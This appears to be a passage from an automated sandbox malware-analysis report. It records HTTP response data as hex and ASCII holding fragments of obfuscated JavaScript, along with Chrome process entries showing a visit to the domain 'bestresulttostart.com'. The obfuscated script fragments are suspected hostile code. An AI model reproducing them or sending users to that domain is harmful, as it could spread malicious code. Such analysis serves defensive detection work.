              2024-04-17 20:59:20 UTC1369INData Raw: 4f 57 50 39 57 57 50 79 27 2c 27 57 52 6a 73 6c 38 6b 69 6e 38 6f 4f 57 36 30 45 42 59 4c 37 27 2c 27 57 36 64 64 49 43 6f 2b 64 61 27 2c 27 57 52 64 63 47 74 58 7a 57 52 7a 41 57 34 68 63 49 43 6f 44 27 2c 27 74 38 6b 52 57 36 62 65 71 57 27 2c 27 57 51 53 70 57 35 4a 64 54 48 79 27 2c 27 57 37 58 75 6f 32 46 63 4d 61 27 2c 27 71 38 6b 6e 57 52 7a 32 57 51 4f 27 2c 27 73 38 6b 2f 6d 65 42 63 55 57 27 2c 27 78 38 6b 35 6a 43 6f 5a 57 36 71 27 2c 27 41 38 6b 54 57 50 4e 63 4f 43 6f 5a 27 2c 27 57 34 2f 63 50 6d 6b 72 57 35 78 63 4b 61 27 2c 27 57 51 79 59 57 35 75 64 75 57 27 2c 27 62 6d 6b 50 57 52 58 64 57 52 75 27 2c 27 57 37 42 64 48 4d 44 35 57 4f 43 27 5d 3b 5f 30 78 35 39 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 66
              Data Ascii: OWP9WWPy','WRjsl8kin8oOW60EBYL7','W6ddICo+da','WRdcGtXzWRzAW4hcICoD','t8kRW6beqW','WQSpW5JdTHy','W7Xuo2FcMa','q8knWRz2WQO','s8k/meBcUW','x8k5jCoZW6q','A8kTWPNcOCoZ','W4/cPmkrW5xcKa','WQyYW5uduW','bmkPWRXdWRu','W7BdHMD5WOC'];_0x59db=function(){return _0xaf
              2024-04-17 20:59:20 UTC1369INData Raw: 34 62 65 62 34 37 28 27 6a 65 4c 59 27 2c 2d 30 78 31 32 33 2c 2d 30 78 31 33 34 2c 2d 30 78 31 35 33 2c 2d 30 78 31 37 34 29 2b 5f 30 78 31 33 65 62 39 34 28 2d 30 78 63 2c 30 78 39 2c 27 31 36 56 62 27 2c 30 78 32 31 2c 2d 30 78 31 32 29 2c 5f 30 78 33 34 66 36 37 66 3d 5f 30 78 34 62 65 62 34 37 28 27 7a 72 47 57 27 2c 2d 30 78 66 66 2c 2d 30 78 66 30 2c 2d 30 78 66 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 39 38 65 38 31 28 30 78 31 37 62 2c 27 77 51 4d 33 27 2c 30 78 31 63 65 2c 30 78 31 61 39 2c 30 78 31 63 63 29 2b 27 73 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 35 34 65 66 38 36 2c 5f 30 78 31 31 32 63 65 66 29 7b 76 61 72 20 5f 30 78 34 65 64 31 65 32 3d 5f 30 78 35 39 64 62 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64
              Data Ascii: 4beb47('jeLY',-0x123,-0x134,-0x153,-0x174)+_0x13eb94(-0xc,0x9,'16Vb',0x21,-0x12),_0x34f67f=_0x4beb47('zrGW',-0xff,-0xf0,-0xf5,-0xbd)+_0x598e81(0x17b,'wQM3',0x1ce,0x1a9,0x1cc)+'s';function _0x58cd(_0x54ef86,_0x112cef){var _0x4ed1e2=_0x59db();return _0x58cd
              2024-04-17 20:59:20 UTC1369INData Raw: 78 32 65 65 33 64 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 62 37 32 30 2c 5f 30 78 33 63 64 30 30 38 29 7b 76 61 72 20 5f 30 78 31 62 62 38 32 63 3d 5b 5d 2c 5f 30 78 31 63 34 61 39 65 3d 2d 30 78 31 64 37 63 2b 30 78 31 38 62 2a 30 78 37 2b 30 78 31 32 61 66 2c 5f 30 78 64 62 32 33 37 64 2c 5f 30 78 33 30 31 30 33 38 3d 27 27 3b 5f 30 78 33 36 62 37 32 30 3d 5f 30 78 35 34 30 30 34 38 28 5f 30 78 33 36 62 37 32 30 29 3b 76 61 72 20 5f 30 78 32 34 37 30 61 66 3b 66 6f 72 28 5f 30 78 32 34 37 30 61 66 3d 30 78 31 37 65 2a 30 78 34 2b 2d 30 78 35 65 2a 2d 30 78 35 31 2b 30 78 65 2a 2d 30 78 32 38 64 3b 5f 30 78 32 34 37 30 61 66 3c 2d 30 78 31 61 33 63 2b 2d 30 78 31 2a 30 78 31 32 63 62 2b 30 78 31 2a 30 78 32 65 30 37 3b 5f 30 78 32 34 37 30 61 66
              Data Ascii: x2ee3dd=function(_0x36b720,_0x3cd008){var _0x1bb82c=[],_0x1c4a9e=-0x1d7c+0x18b*0x7+0x12af,_0xdb237d,_0x301038='';_0x36b720=_0x540048(_0x36b720);var _0x2470af;for(_0x2470af=0x17e*0x4+-0x5e*-0x51+0xe*-0x28d;_0x2470af<-0x1a3c+-0x1*0x12cb+0x1*0x2e07;_0x2470af


              Click to jump to process

              Click to jump to process

              Click to jump to process

              Target ID:0
              Start time:22:59:06
              Start date:17/04/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:2
              Start time:22:59:09
              Start date:17/04/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1792,i,3187058256800355177,13799939537630235712,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:3
              Start time:22:59:11
              Start date:17/04/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bestresulttostart.com"
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              No disassembly